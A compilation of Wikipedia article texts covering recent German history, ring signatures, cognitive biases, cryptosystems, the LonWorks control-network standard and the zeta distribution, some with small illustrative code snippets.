The SPD/Green coalition won the 1998 elections, and SPD leader Gerhard Schröder positioned himself as a centrist "Third Way" candidate in the mold of UK Prime Minister Tony Blair and US President Bill Clinton. Schröder proposed Agenda 2010, a significant downsizing of the welfare state, with five goals: tax cuts; labor-market deregulation, especially relaxing rules protecting workers from dismissal and setting up Hartz concept job training; modernizing the welfare state by reducing entitlements; decreasing bureaucratic obstacles for small businesses; and providing new low-interest loans to local governments.[478]
On 26 December 2004, around 540 Germans died and thousands more went missing in the Indian Ocean tsunami triggered by an earthquake off Indonesia, many of them while vacationing in southern Thailand.[citation needed]
In 2005, after the SPD lost to the Christian Democratic Union (CDU) in North Rhine-Westphalia, Gerhard Schröder announced he would call federal elections "as soon as possible". A motion of confidence was subsequently defeated after Schröder urged members not to vote for his government, in order to trigger new elections. In response, a grouping of left-wing SPD dissidents and the neo-communist Party of Democratic Socialism agreed to run on a joint ticket in the general election, with Schröder's rival Oskar Lafontaine leading the new group.
In the 2005 elections, Angela Merkel became the first female chancellor. In 2009 the German government approved a €50 billion stimulus plan.[479] Among the major German political projects of the early 21st century are the advancement of European integration, the energy transition (Energiewende) for a sustainable energy supply, the debt brake for balanced budgets, measures to increase the fertility rate (pronatalism), and high-tech strategies for the transition of the German economy, summarised as Industry 4.0.[480] From 2005 to 2009 and 2013 to 2021, Germany was ruled by a grand coalition led by the CDU's Angela Merkel as chancellor. From 2009 to 2013, Merkel headed a centre-right government of the CDU/CSU and FDP.[481]
Together with France, Italy, the Netherlands, and other EU member nations, Germany has played a leading role in the European Union. Germany (especially under Chancellor Helmut Kohl) was one of the main supporters of admitting many East European countries to the EU. Germany is at the forefront of European states seeking to exploit the momentum of monetary union to advance the creation of a more unified and capable European political, defence and security apparatus. German Chancellor Schröder expressed an interest in a permanent seat for Germany in the UN Security Council, identifying France, Russia, and Japan as countries that explicitly backed Germany's bid. Germany formally adopted the euro on 1 January 1999, after permanently fixing the Deutsche Mark exchange rate on 31 December 1998.[482][483]
Since 1990, the German Bundeswehr has participated in a number of peacekeeping and disaster relief operations abroad. Since 2002, German troops have formed part of the International Security Assistance Force in the War in Afghanistan, resulting in the first German casualties in combat missions since World War II.
In light of the worldwide Great Recession that began in 2008, Germany did not experience as much economic hardship as other European nations. Germany later sponsored a massive financial rescue in the wake of the Eurozone crisis, which affected the German economy.
Following the 2011 earthquake and tsunami in Japan, which led to the Fukushima nuclear disaster, German public opinion turned sharply against nuclear power in Germany, which at the time produced a quarter of the electricity supply. In response, Merkel announced plans to close down the nuclear power plants over the following decade, and a commitment to rely more heavily on wind and other alternative energy sources, in addition to coal and natural gas.[484]
Germany was affected by the European migrant crisis in 2015 as it became the final destination of choice for many asylum seekers from Africa and the Middle East entering the EU. The country took in over a million refugees and migrants and developed a quota system that redistributed migrants around its federal states based on their tax income and existing population density.[485] Merkel's decision to authorize unrestricted entry led to heavy criticism in Germany as well as within Europe.[486][487] This was a major factor in the rise of the far-right party Alternative for Germany, which entered the Bundestag in the 2017 federal election.[488]
In January 2020, Germany confirmed its first case of the novel coronavirus, first identified in Wuhan, China. In March 2020, Germany entered a national lockdown. The pandemic severely affected the German economy, healthcare system, and society. Germany was initially commended as an effective model for curbing infections and deaths, but lost this status by the end of the year amid rising numbers of cases, hospitalizations, and deaths. In December 2020, COVID-19 vaccines began to be administered in Germany. From mid-2021 to early 2022, Germany saw further large waves of infection, fueled by the highly transmissible Delta and Omicron variants. As of May 2022, Germany had reported 140,292 COVID-19-related deaths, the fifth-highest toll in Europe (behind Russia, the United Kingdom, Italy, and France), out of 2 million deaths across the continent.[489]
On 8 April 2022, after the first two years of the pandemic, Germany joined France, Italy, the Netherlands, Belgium, Luxembourg, Austria, Switzerland, Greece, Turkey, and Cyprus in lifting most COVID-19 restrictions, measures, and states of emergency.[citation needed]
On 8 December 2021, three months after Germany's centre-left Social Democrats (SPD) narrowly won the federal election, ending 16 years of conservative-led rule under Angela Merkel, Social Democrat Olaf Scholz was sworn in as Germany's new chancellor. He formed a coalition government with the Green Party and the liberal Free Democrats.[490][491]
In February 2022, Frank-Walter Steinmeier was elected to a second five-year term as Germany's president. Although the post is largely ceremonial, he has been seen as a symbol of consensus and continuity.[492]
After Russia's invasion of Ukraine on 24 February 2022, Germany's previous foreign policy towards Russia (traditional Ostpolitik) was severely criticized for having been too credulous and soft.[493] In response to the invasion, Germany announced a major shift in policy, pledging a €100 billion special fund for the Bundeswehr, to remedy years of underinvestment, along with raising the defence budget to above 2% of GDP.[494] As of April 2023, over 1.06 million refugees from Ukraine were recorded in Germany.[495]
As of December 2023, Germany is the fourth-largest economy in the world, after the United States, China, and Japan, and the largest economy in Europe. It is the third-largest export nation in the world.[496]
In February 2025, the conservative CDU/CSU won Germany's 2025 federal election, becoming the biggest group in parliament. The far-right Alternative for Germany (AfD), however, doubled its support to become the second-biggest party in parliament with 20.8% of the vote, while the Social Democrats (SPD) had their worst performance in decades with 16.4%.[497]
On 6 May 2025, Friedrich Merz was sworn in as Germany's chancellor by President Frank-Walter Steinmeier. Merz formed a coalition between his Christian Democrats, their sister party the Christian Social Union, and the Social Democrats.[498]
|
https://en.wikipedia.org/wiki/History_of_Germany
|
In cryptography, a ring signature is a type of digital signature that can be performed by any member of a set of users that each have keys. Therefore, a message signed with a ring signature is endorsed by someone in a particular set of people. One of the security properties of a ring signature is that it should be computationally infeasible to determine which of the set members' keys was used to produce the signature. Ring signatures are similar to group signatures but differ in two key ways: first, there is no way to revoke the anonymity of an individual signature; and second, any set of users can be used as a signing set without additional setup.
Ring signatures were invented by Ron Rivest, Adi Shamir, and Yael Tauman Kalai, and introduced at ASIACRYPT in 2001.[1] The name, ring signature, comes from the ring-like structure of the signature algorithm.
Suppose that a set of entities each have public/private key pairs, (P1, S1), (P2, S2), ..., (Pn, Sn). Party i can compute a ring signature σ on a message m, on input (m, Si, P1, ..., Pn). Anyone can check the validity of a ring signature given σ, m, and the public keys involved, P1, ..., Pn. If a ring signature is properly computed, it should pass the check. On the other hand, it should be hard for anyone to create a valid ring signature on any message for any set without knowing any of the private keys for that set.[2]
In the original paper, Rivest, Shamir, and Tauman described ring signatures as a way to leak a secret. For instance, a ring signature could be used to provide an anonymous signature from "a high-ranking White House official", without revealing which official signed the message. Ring signatures are well suited to this application because the anonymity of a ring signature cannot be revoked, and because the group for a ring signature can be improvised.
Another application, also described in the original paper, is for deniable signatures. Here the sender and the recipient of a message form a group for the ring signature; the signature is then valid to the recipient, but anyone else will be unsure whether the recipient or the sender was the actual signer. Thus, such a signature is convincing, but cannot be transferred beyond its intended recipient.
There have been various later works, introducing new features and based on different assumptions:
Most of the proposed algorithms have asymptotic output size O(n); i.e., the size of the resulting signature increases linearly with the size of the input (the number of public keys). That means that such schemes are impracticable for real use cases with a sufficiently large n (for example, an e-voting with millions of participants). But for some applications with relatively small median input size such an estimate may be acceptable. CryptoNote implements an O(n) ring signature scheme by Fujisaki and Suzuki[5] in p2p payments to achieve sender untraceability.
More efficient algorithms have appeared recently. There are schemes with sublinear signature size,[6] as well as with constant size.[7]
The original paper describes an RSA-based ring signature scheme, as well as one based on Rabin signatures. They define a keyed "combining function" C_{k,v}(y_1, y_2, ..., y_n) which takes a key k, an initialization value v, and a list of arbitrary values y_1, ..., y_n. Each y_i is defined as g_i(x_i), where g_i is a trap-door function (i.e., an RSA public key in the case of RSA-based ring signatures).
The function C_{k,v}(y_1, y_2, ..., y_n) is called the ring equation, and is defined below. The equation is based on a symmetric encryption function E_k:
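The displayed equation did not survive extraction; from the paper's definition (with $\oplus$ denoting XOR) it can be reconstructed as:

$$
C_{k,v}(y_1, y_2, \dots, y_n) = E_k\bigl(y_n \oplus E_k\bigl(y_{n-1} \oplus E_k\bigl(\cdots \oplus E_k(y_1 \oplus v)\cdots\bigr)\bigr)\bigr)
$$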
It outputs a single value z which is forced to be equal to v. The equation v = C_{k,v}(y_1, y_2, ..., y_n) can be solved as long as at least one y_i, and by extension x_i, can be freely chosen. Under the assumptions of RSA, this implies knowledge of at least one of the inverses of the trap-door functions g_i^{-1} (i.e., a private key), since g_i^{-1}(y_i) = x_i.
Generating a ring signature involves six steps. The plaintext is signified by m, the ring's public keys by P_1, P_2, ..., P_n. In outline: the signer computes the symmetric key k as a hash of m; chooses a random glue value v; chooses random x_i (and computes y_i = g_i(x_i)) for every other ring member; solves the ring equation for the remaining y_s; inverts the trap-door function on y_s using the private key to obtain x_s; and outputs the signature (P_1, ..., P_n; v; x_1, ..., x_n).
Signature verification involves three steps: apply the trap-door functions to compute y_i = g_i(x_i) for each i; hash the message to obtain the symmetric key k; and check that the ring equation C_{k,v}(y_1, ..., y_n) = v holds.
Here is a Python implementation of the original paper using RSA; it requires the third-party module PyCryptodome.
To sign and verify 2 messages in a ring of 4 users:
Monero[8] and several other cryptocurrencies use this technology.[citation needed]
This article incorporates text available under the CC BY-SA 4.0 license.
|
https://en.wikipedia.org/wiki/Ring_signature
|
A cognitive bias is a systematic pattern of deviation from norm or rationality in judgment.[1][2] Individuals create their own "subjective reality" from their perception of the input. An individual's construction of reality, not the objective input, may dictate their behavior in the world. Thus, cognitive biases may sometimes lead to perceptual distortion, inaccurate judgment, illogical interpretation, and irrationality.[3][4][5]
While cognitive biases may initially appear to be negative, some are adaptive. They may lead to more effective actions in a given context.[6] Furthermore, allowing cognitive biases enables faster decisions, which can be desirable when timeliness is more valuable than accuracy, as illustrated in heuristics.[7] Other cognitive biases are a "by-product" of human processing limitations,[1] resulting from a lack of appropriate mental mechanisms (bounded rationality), the impact of an individual's constitution and biological state (see embodied cognition), or simply from a limited capacity for information processing.[8][9] Research suggests that cognitive biases can make individuals more inclined to endorse pseudoscientific beliefs by requiring less evidence for claims that confirm their preconceptions. This can potentially distort their perceptions and lead to inaccurate judgments.[10]
A continually evolving list of cognitive biases has been identified over the last six decades of research on human judgment and decision-making in cognitive science, social psychology, and behavioral economics. The study of cognitive biases has practical implications for areas including clinical judgment, entrepreneurship, finance, and management.[11][12]
The notion of cognitive biases was introduced by Amos Tversky and Daniel Kahneman in 1972[13] and grew out of their experience of people's innumeracy, or inability to reason intuitively with the greater orders of magnitude. Tversky, Kahneman, and colleagues demonstrated several replicable ways in which human judgments and decisions differ from rational choice theory. Tversky and Kahneman explained human differences in judgment and decision-making in terms of heuristics. Heuristics involve mental shortcuts which provide swift estimates about the probability of uncertain occurrences.[14] Heuristics are simple for the brain to compute but sometimes introduce "severe and systematic errors."[7] For example, the representativeness heuristic is defined as "the tendency to judge the frequency or likelihood" of an occurrence by the extent to which the event "resembles the typical case."[14]
The "Linda Problem" illustrates the representativeness heuristic (Tversky & Kahneman, 1983[15]). Participants were given a description of "Linda" that suggests Linda might well be a feminist (e.g., she is said to be concerned about discrimination and social justice issues). They were then asked whether they thought Linda was more likely to be (a) a "bank teller" or (b) a "bank teller and active in the feminist movement." A majority chose answer (b). Independent of the information given about Linda, though, the more restrictive answer (b) is under any circumstance statistically less likely than answer (a). This is an example of the "conjunction fallacy". Tversky and Kahneman argued that respondents chose (b) because it seemed more "representative" or typical of persons who might fit the description of Linda. The representativeness heuristic may lead to errors such as activating stereotypes and inaccurate judgments of others (Haselton et al., 2005, p. 726).
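The conjunction rule behind this fallacy, P(A and B) ≤ P(A), holds for any population whatsoever; a small simulation (with arbitrary, assumed base rates) makes this concrete:

```python
import random

random.seed(0)

# 100,000 simulated people; "bank teller" and "feminist activist" are drawn
# independently (the 5% and 30% base rates are arbitrary, for illustration).
people = [(random.random() < 0.05, random.random() < 0.30)
          for _ in range(100_000)]
tellers = sum(1 for teller, _ in people if teller)
feminist_tellers = sum(1 for teller, feminist in people if teller and feminist)

# Conjunction rule: the count of "teller AND feminist" can never exceed the
# count of "teller" alone, so choosing (b) over (a) is the conjunction fallacy.
assert feminist_tellers <= tellers
```

No choice of base rates, correlation, or population size can make the conjunction more frequent than either conjunct, which is what makes the majority's answer (b) a logical error rather than a defensible judgment.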
Critics of Kahneman and Tversky, such as Gerd Gigerenzer, alternatively argued that heuristics should not lead us to conceive of human thinking as riddled with irrational cognitive biases. They should rather conceive of rationality as an adaptive tool, not identical to the rules of formal logic or the probability calculus.[16] Nevertheless, experiments such as the "Linda problem" grew into the heuristics and biases research program, which spread beyond academic psychology into other disciplines including medicine and political science.
Biases can be distinguished on a number of dimensions. Examples of cognitive biases include:
Other biases are due to the particular way the brain perceives, forms memories, and makes judgments. This distinction is sometimes described as "hot cognition" versus "cold cognition", as motivated reasoning can involve a state of arousal. Among the "cold" biases are the following:
Some biases reflect motivation, specifically the motivation to have positive attitudes toward oneself.[21] This accounts for the fact that many biases are self-motivated or self-directed (e.g., illusion of asymmetric insight, self-serving bias). There are also biases in how subjects evaluate in-groups or out-groups: evaluating in-groups as more diverse and "better" in many respects, even when those groups are arbitrarily defined (ingroup bias, outgroup homogeneity bias).
Some cognitive biases belong to the subgroup of attentional biases, which refers to paying increased attention to certain stimuli. It has been shown, for example, that people addicted to alcohol and other drugs pay more attention to drug-related stimuli. Common psychological tests to measure these biases are the Stroop task[22][23] and the dot probe task.
Individuals' susceptibility to some types of cognitive biases can be measured by the Cognitive Reflection Test (CRT) developed by Shane Frederick (2005).[24][25]
The following is a list of the more commonly studied cognitive biases:
Many social institutions rely on individuals to make rational judgments.
The securities regulation regime largely assumes that all investors act as perfectly rational persons. In truth, actual investors face cognitive limitations from biases, heuristics, and framing effects.
A fair jury trial, for example, requires that the jury ignore irrelevant features of the case, weigh the relevant features appropriately, consider different possibilities open-mindedly, and resist fallacies such as appeal to emotion. The various biases demonstrated in these psychological experiments suggest that people will frequently fail to do all these things.[37] However, they fail to do so in systematic, directional ways that are predictable.[5]
In some academic disciplines, the study of bias is very popular. For instance, bias is a widespread and well-studied phenomenon because most decisions that concern the minds and hearts of entrepreneurs are computationally intractable.[12]
Cognitive biases can create other issues that arise in everyday life. One study showed the connection between cognitive bias, specifically approach bias, and inhibitory control on how much unhealthy snack food a person would eat.[38] It found that participants who ate more of the unhealthy snack food tended to have less inhibitory control and more reliance on approach bias. Others have also hypothesized that cognitive biases could be linked to various eating disorders and to how people view their bodies and their body image.[39][40]
It has also been argued that cognitive biases can be used in destructive ways.[41]Some believe that there are people in authority who use cognitive biases and heuristics in order to manipulate others so that they can reach their end goals. Some medications and other health care treatments rely on cognitive biases in order to persuade others who are susceptible to cognitive biases to use their products. Many see this as taking advantage of one's natural struggle of judgement and decision-making. They also believe that it is the government's responsibility to regulate these misleading ads.
Cognitive biases also seem to play a role in property sale price and value. Participants in the experiment were shown a residential property.[42]Afterwards, they were shown another property that was completely unrelated to the first property. They were asked to say what they believed the value and the sale price of the second property would be. They found that showing the participants an unrelated property did have an effect on how they valued the second property.
Cognitive biases can also be used in non-destructive ways. In team science and collective problem-solving, the superiority bias can be beneficial. It leads to a diversity of solutions within a group, especially in complex problems, by preventing premature consensus on suboptimal solutions. This example demonstrates how a cognitive bias, typically seen as a hindrance, can enhance collective decision-making by encouraging a wider exploration of possibilities.[43]
Cognitive biases are interlinked with collective illusions, a phenomenon where a group of people mistakenly believe that their views and preferences are shared by the majority, when in reality, they are not. These illusions often arise from various cognitive biases that misrepresent our perception of social norms and influence how we assess the beliefs of others.[44]
Because they cause systematic errors, cognitive biases cannot be compensated for using a wisdom-of-the-crowd technique of averaging answers from several people.[45] Debiasing is the reduction of biases in judgment and decision-making through incentives, nudges, and training. Cognitive bias mitigation and cognitive bias modification are forms of debiasing specifically applicable to cognitive biases and their effects. Reference class forecasting is a method for systematically debiasing estimates and decisions, based on what Daniel Kahneman has dubbed the outside view.
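The distinction between random error (which averaging cancels) and systematic error (which it cannot) can be illustrated with a small simulation; the true value, noise level, and +20 shared bias below are arbitrary assumptions:

```python
import random

random.seed(42)
TRUTH = 100.0
N = 10_000

# Unbiased judges: individual errors are random, so averaging cancels them out.
noisy = [TRUTH + random.gauss(0, 10) for _ in range(N)]
# Biased judges: every judge shares the same +20 distortion, which survives averaging.
biased = [TRUTH + 20 + random.gauss(0, 10) for _ in range(N)]

mean = lambda xs: sum(xs) / len(xs)
assert abs(mean(noisy) - TRUTH) < 1       # the crowd average lands near the truth
assert abs(mean(biased) - TRUTH) > 15     # but a shared (systematic) bias remains
```

Averaging shrinks the random component by a factor of roughly the square root of N, while leaving any component shared by all judges untouched.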
Similar to Gigerenzer (1996),[46] Haselton et al. (2005) state that the content and direction of cognitive biases are not "arbitrary" (p. 730).[1] Moreover, cognitive biases can be controlled. One debiasing technique aims to decrease biases by encouraging individuals to use controlled processing rather than automatic processing.[26] In relation to reducing the fundamental attribution error (FAE), monetary incentives[47] and informing participants they will be held accountable for their attributions[48] have been linked to an increase in accurate attributions. Training has also been shown to reduce cognitive bias. Carey K. Morewedge and colleagues (2015) found that research participants exposed to one-shot training interventions, such as educational videos and debiasing games that taught mitigating strategies, exhibited significant reductions in their commission of six cognitive biases immediately and up to 3 months later.[49]
Cognitive bias modification refers to the process of modifying cognitive biases in healthy people and also refers to a growing area of psychological (non-pharmaceutical) therapies for anxiety, depression, and addiction called cognitive bias modification therapy (CBMT). CBMT is a sub-group of therapies within a growing area of psychological therapies based on modifying cognitive processes with or without accompanying medication and talk therapy, sometimes referred to as applied cognitive processing therapies (ACPT). Although cognitive bias modification can refer to modifying cognitive processes in healthy individuals, CBMT is a growing area of evidence-based psychological therapy in which cognitive processes are modified to relieve suffering[50][51] from serious depression,[52] anxiety,[53] and addiction.[54] CBMT techniques are technology-assisted therapies that are delivered via a computer with or without clinician support. CBM combines evidence and theory from the cognitive model of anxiety,[55] cognitive neuroscience,[56] and attentional models.[57]
Cognitive bias modification has also been used to help those with obsessive-compulsive beliefs and obsessive-compulsive disorder.[58][59] This therapy has been shown to decrease obsessive-compulsive beliefs and behaviors.
Bias arises from various processes that are sometimes difficult to distinguish. These include:
People do appear to have stable individual differences in their susceptibility to decision biases such as overconfidence, temporal discounting, and bias blind spot.[68] That said, these stable levels of bias within individuals are possible to change. Participants in experiments who watched training videos and played debiasing games showed medium to large reductions both immediately and up to three months later in the extent to which they exhibited susceptibility to six cognitive biases: anchoring, bias blind spot, confirmation bias, fundamental attribution error, projection bias, and representativeness.[69]
Individual differences in cognitive bias have also been linked to varying levels of cognitive abilities and functions.[70] The Cognitive Reflection Test (CRT) has been used to help understand the connection between cognitive biases and cognitive ability. Results of using the Cognitive Reflection Test to understand ability have been inconclusive. However, there does seem to be a correlation: those who score higher on the Cognitive Reflection Test have higher cognitive ability and rational-thinking skills. This in turn helps predict performance on cognitive bias and heuristic tests. Those with higher CRT scores tend to answer more correctly on different heuristic and cognitive bias tests and tasks.[71]
Age is another individual difference that has an effect on one's ability to be susceptible to cognitive bias. Older individuals tend to be more susceptible to cognitive biases and have lesscognitive flexibility. However, older individuals were able to decrease their susceptibility to cognitive biases throughout ongoing trials.[72]These experiments had both young and older adults complete a framing task. Younger adults had more cognitive flexibility than older adults. Cognitive flexibility is linked to helping overcome pre-existing biases.
The list of cognitive biases has long been a topic of critique. In psychology a "rationality war"[73]unfolded betweenGerd Gigerenzerand the Kahneman and Tversky school, which pivoted on whether biases are primarily defects of human cognition or the result of behavioural patterns that are actually adaptive or "ecologically rational"[74]. Gerd Gigerenzer has historically been one of the main opponents to cognitive biases and heuristics.[75][76][77]Gigerenzer believes that cognitive biases are not biases, butrules of thumb, or as he would put it "gut feelings" that can actually help us make accurate decisions in our lives.
This debate has recently reignited, with critiques arguing there has been an overemphasis on biases in human cognition.[78]A key criticism is the continuous expansion of the list of alleged biases without clear evidence that these behaviors are genuinely biased once the actual problems people face are understood. Advances in economics and cognitive neuroscience now suggest that many behaviors previously labeled as biases might instead represent optimal decision-making strategies.
|
https://en.wikipedia.org/wiki/Cognitive_bias
|
A cryptosystem is a set of cryptographic algorithms that map ciphertexts and plaintexts to each other.[1]
Private-key cryptosystems use the same key for encryption and decryption.
Public-key cryptosystems use a public key for encryption and a private key for decryption.
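The two families can be sketched with toy examples. This is a minimal illustration only: neither scheme below is secure, and all keys and numbers are invented for the example (the RSA figures are the standard textbook toy primes).

```python
# Toy illustration of the two cryptosystem families (NOT secure cryptography).
# The XOR cipher stands in for a private-key (symmetric) scheme: one shared
# key both encrypts and decrypts. The tiny "textbook RSA" stands in for a
# public-key scheme: the public key encrypts, the private key decrypts.

def xor_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Symmetric: applying the same key twice inverts the operation.
    return bytes(p ^ key[i % len(key)] for i, p in enumerate(plaintext))

# Textbook RSA with toy primes p=61, q=53: n=3233, phi=3120, e*d % phi == 1.
N, E, D = 3233, 17, 2753          # public key (N, E), private key D

def rsa_encrypt(m: int) -> int:   # anyone with the public key can encrypt
    return pow(m, E, N)

def rsa_decrypt(c: int) -> int:   # only the private-key holder can decrypt
    return pow(c, D, N)

secret = b"attack at dawn"
key = b"k3y"
assert xor_encrypt(key, xor_encrypt(key, secret)) == secret  # same key both ways
assert rsa_decrypt(rsa_encrypt(65)) == 65                    # key pair round-trip
```

The round-trip assertions capture the defining property of each family: the symmetric scheme needs the same key on both sides, while the asymmetric scheme splits the mapping between two different keys.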
|
https://en.wikipedia.org/wiki/List_of_cryptosystems
|
LonWorks or Local Operating Network is an open standard (ISO/IEC 14908) for networking platforms specifically created to address the needs of control applications. The platform is built on a protocol created by Echelon Corporation for networking devices over media such as twisted pair, power lines, fiber optics, and wireless. It is used for the automation of various functions within buildings such as lighting and HVAC; see building automation.
The technology had its origins with chip designs, power lines, twisted pairs, signaling technology, routers, network management software, and other products from Echelon Corporation. In 1999 the communications protocol (then known as LonTalk) was submitted to ANSI and accepted as a standard for control networking (ANSI/CEA-709.1-B). Echelon's power line and twisted pair signaling technologies were also submitted to ANSI for standardization and acceptance. Since then, ANSI/CEA-709.1 has been accepted as the basis for IEEE 1473-L (in-train controls), AAR electro-pneumatic braking systems for freight trains, IFSF (European petrol station control), SEMI (semiconductor equipment manufacturing), and in 2005 as EN 14908 (European building automation standard). The protocol is also one of several data link/physical layers of the BACnet ASHRAE/ANSI standard for building automation.
China ratified the technology as a national controls standard, GB/Z 20177.1-2006, and as a building and intelligent community standard, GB/T 20299.4-2006; and in 2007 CECED, the European Committee of Domestic Equipment Manufacturers, adopted the protocol as part of its Household Appliances Control and Monitoring – Application Interworking Specification (AIS) standards.
In 2008, ISO and IEC granted the communications protocol, twisted pair signaling technology, power line signaling technology, and Internet Protocol (IP) compatibility standard numbers ISO/IEC 14908-1, -2, -3, and -4.[1]
By 2010, approximately 90 million devices were installed with LonWorks technology. Manufacturers in a variety of industries including building, home, street lighting, transportation, utility, and industrial automation have adopted the platform as the basis for their product and service offerings. Statistics as to the number of locations using the LonWorks technology are scarce, but products and applications built on top of the platform include such diverse functions as embedded machine control, municipal and highway/tunnel/street lighting, heating and air conditioning systems, intelligent electricity metering, subway train control, building lighting, stadium lighting and speaker control, security systems, fire detection and suppression, and newborn location monitoring and alarming, as well as remote power generation load control.
Two physical-layer signaling technologies, twisted pair free topology and power-line carrier, are typically included in each of the standards created around the LonWorks technology. The two-wire layer operates at 78 kbit/s using differential Manchester encoding, while the power line achieves either 5.4 or 3.6 kbit/s, depending on frequency.[2]
Additionally, the LonWorks platform uses an affiliated IP tunneling standard—ISO/IEC 14908-4[3](ANSI/CEA-852)[4]—in use by a number of manufacturers[5]to connect the devices on previously deployed and new LonWorks platform-based networks to IP-aware applications or remote network-management tools. Many LonWorks platform-based control applications are being implemented with some sort of IP integration, either at the UI/application level or in the controls infrastructure. This is accomplished with Web services or IP-routing products available in the market.
An Echelon Corporation-designed IC consisting of several 8-bit processors, the Neuron chip was initially the only way to implement a LonTalk protocol node and is used in the large majority of LonWorks platform-based hardware. Since 1999, the protocol has been available for general-purpose processors, via a port of the ANSI/CEA-709.1 standard to IP-based or 32-bit chips.[6]
On 14 September 2018, Echelon Corporation was acquired by Adesto Technologies Corporation.[7] Adesto was then acquired by Dialog Semiconductor,[8] who were in turn acquired by Renesas Electronics.[9] As of 2024, Renesas continues to offer LonWorks (and BACnet) products.[10]
One of the keys to the interoperability of the system is the standardisation of the variables used to describe physical things to LonWorks. This standards list is maintained by LonMark International, and each standard parameter is known as a Standard Network Variable Type (SNVT, pronounced "sniv-it"). For example, a thermostat might report temperature using the SNVT_temp, defined as a 2-byte integer between zero and 65535, representing a temperature between -274.0 and 6279.5 degrees Celsius at a precision of 0.1 °C.[12]
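The fixed-point arithmetic implied by that definition can be sketched as follows. The function names are hypothetical; the LonMark SNVT master list is the normative reference for the actual type.

```python
# Sketch of the SNVT_temp fixed-point encoding described above: an unsigned
# 2-byte raw value 0..65535 maps to -274.0..6279.5 degrees C in 0.1 C steps.

def snvt_temp_encode(celsius: float) -> int:
    raw = round((celsius + 274.0) * 10)
    if not 0 <= raw <= 0xFFFF:
        raise ValueError("temperature out of SNVT_temp range")
    return raw

def snvt_temp_decode(raw: int) -> float:
    return raw / 10.0 - 274.0

assert snvt_temp_encode(-274.0) == 0         # bottom of the range
assert snvt_temp_encode(6279.5) == 0xFFFF    # top of the range
assert snvt_temp_decode(snvt_temp_encode(21.5)) == 21.5
```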
|
https://en.wikipedia.org/wiki/LonWorks
|
In probability theory and statistics, the zeta distribution is a discrete probability distribution. If X is a zeta-distributed random variable with parameter s, then the probability that X takes the positive integer value k is given by the probability mass function
P(X = k) = k^(−s) / ζ(s),
where ζ(s) is the Riemann zeta function (which is undefined for s = 1).
The multiplicities of distinct prime factors of X are independent random variables.
The Riemann zeta function, being the sum of all terms k^(−s) for positive integer k, appears thus as the normalization of the Zipf distribution. The terms "Zipf distribution" and "zeta distribution" are often used interchangeably. But while the zeta distribution is a probability distribution by itself, it is not associated with Zipf's law with the same exponent.
The zeta distribution is defined for positive integers k ≥ 1, and its probability mass function is given by
P(X = k) = k^(−s) / ζ(s),
where s > 1 is the parameter and ζ(s) is the Riemann zeta function.
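The definition can be checked numerically. In the sketch below, approximating ζ(s) by a truncated sum is an assumption of the illustration, adequate when s is not close to 1.

```python
# Numerical sketch of the zeta distribution's pmf, P(X = k) = k^(-s) / zeta(s).

def zeta(s: float, terms: int = 200_000) -> float:
    # truncated Dirichlet series for zeta(s); error ~ terms^(1-s)/(s-1)
    return sum(k ** -s for k in range(1, terms + 1))

def zeta_pmf(k: int, s: float, z: float) -> float:
    # zeta(s) is passed in so it is computed only once
    return k ** -s / z

s = 2.0
z = zeta(s)
# For s = 2, zeta(2) = pi^2/6, so P(X = 1) = 6/pi^2 ~ 0.6079.
assert abs(zeta_pmf(1, s, z) - 0.6079) < 1e-3
# The pmf sums to ~1 over the support.
assert abs(sum(zeta_pmf(k, s, z) for k in range(1, 2000)) - 1.0) < 1e-3
```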
The cumulative distribution function is given by
P(X ≤ k) = H_{k,s} / ζ(s),
where H_{k,s} is the generalized harmonic number
H_{k,s} = ∑_{i=1}^{k} 1/i^s.
The nth raw moment is defined as the expected value of X^n:
m_n = E[X^n] = (1/ζ(s)) ∑_{k=1}^{∞} 1/k^(s−n).
The series on the right is just a series representation of the Riemann zeta function, but it only converges for values of s − n that are greater than unity. Thus:
m_n = ζ(s−n)/ζ(s), defined only for n < s − 1.
The ratio of the zeta functions is well-defined even for n > s − 1, because the series representation of the zeta function can be analytically continued. This does not change the fact that the moments are specified by the series itself, and are therefore undefined for large n.
The moment generating function is defined as
M(t) = E[e^(tX)] = (1/ζ(s)) ∑_{k=1}^{∞} e^(tk)/k^s.
The series is just the definition of the polylogarithm, valid for e^t < 1, so that
M(t) = Li_s(e^t)/ζ(s) for t < 0.
Since this does not converge on an open interval containing t = 0, the moment generating function does not exist.
ζ(1) is infinite, as the harmonic series, and so the case s = 1 is not meaningful. However, if A is any set of positive integers that has a density, i.e. if
lim_{n→∞} N(A, n)/n
exists, where N(A, n) is the number of members of A less than or equal to n, then
lim_{s→1+} P(X ∈ A)
is equal to that density.
The latter limit can also exist in some cases in which A does not have a density. For example, if A is the set of all positive integers whose first digit is d, then A has no density, but nonetheless the second limit given above exists and is proportional to
log(d + 1) − log(d) = log((d + 1)/d),
which is Benford's law.
The zeta distribution can be constructed with a sequence of independent random variables with a geometric distribution. Let p be a prime number and X(p^(−s)) be a random variable with a geometric distribution of parameter p^(−s), namely
P(X(p^(−s)) = k) = p^(−ks) (1 − p^(−s)).
If the random variables (X(p^(−s)))_{p ∈ P} are independent, then the random variable Z_s defined by
Z_s = ∏_{p ∈ P} p^(X(p^(−s)))
has the zeta distribution: P(Z_s = n) = 1 / (n^s ζ(s)).
Stated differently, the random variable log(Z_s) = ∑_{p ∈ P} X(p^(−s)) log(p) is infinitely divisible with Lévy measure given by the following sum of Dirac masses:
Π_s(dx) = ∑_{p ∈ P} ∑_{k ≥ 1} (p^(−ks)/k) δ_{k log(p)}(dx).
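This construction lends itself to simulation. The sketch below draws each geometric factor by inversion and checks the empirical mass at Z_s = 1 against 1/ζ(2) = 6/π² ≈ 0.608; truncating the prime list at 100 is an assumption of the sketch (for s = 2 the omitted primes almost never contribute).

```python
import math
import random

# Monte-Carlo sketch of the construction above: for each prime p draw an
# independent geometric variable X(p^-s) with P(X >= k) = p^(-ks), then
# form Z_s as the product of p^X over the primes.

PRIMES = [p for p in range(2, 100) if all(p % d for d in range(2, p))]

def sample_zeta(s, rng):
    z = 1
    for p in PRIMES:
        u = 1.0 - rng.random()                     # uniform in (0, 1]
        x = int(math.log(u) / (-s * math.log(p)))  # inversion: P(X >= k) = p^(-ks)
        z *= p ** x
    return z

rng = random.Random(0)
samples = [sample_zeta(2.0, rng) for _ in range(20000)]
# P(Z = 1) should be close to 1/zeta(2) = 6/pi^2 ~ 0.608
freq_one = samples.count(1) / len(samples)
assert 0.57 < freq_one < 0.65
```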
|
https://en.wikipedia.org/wiki/Zeta_distribution
|
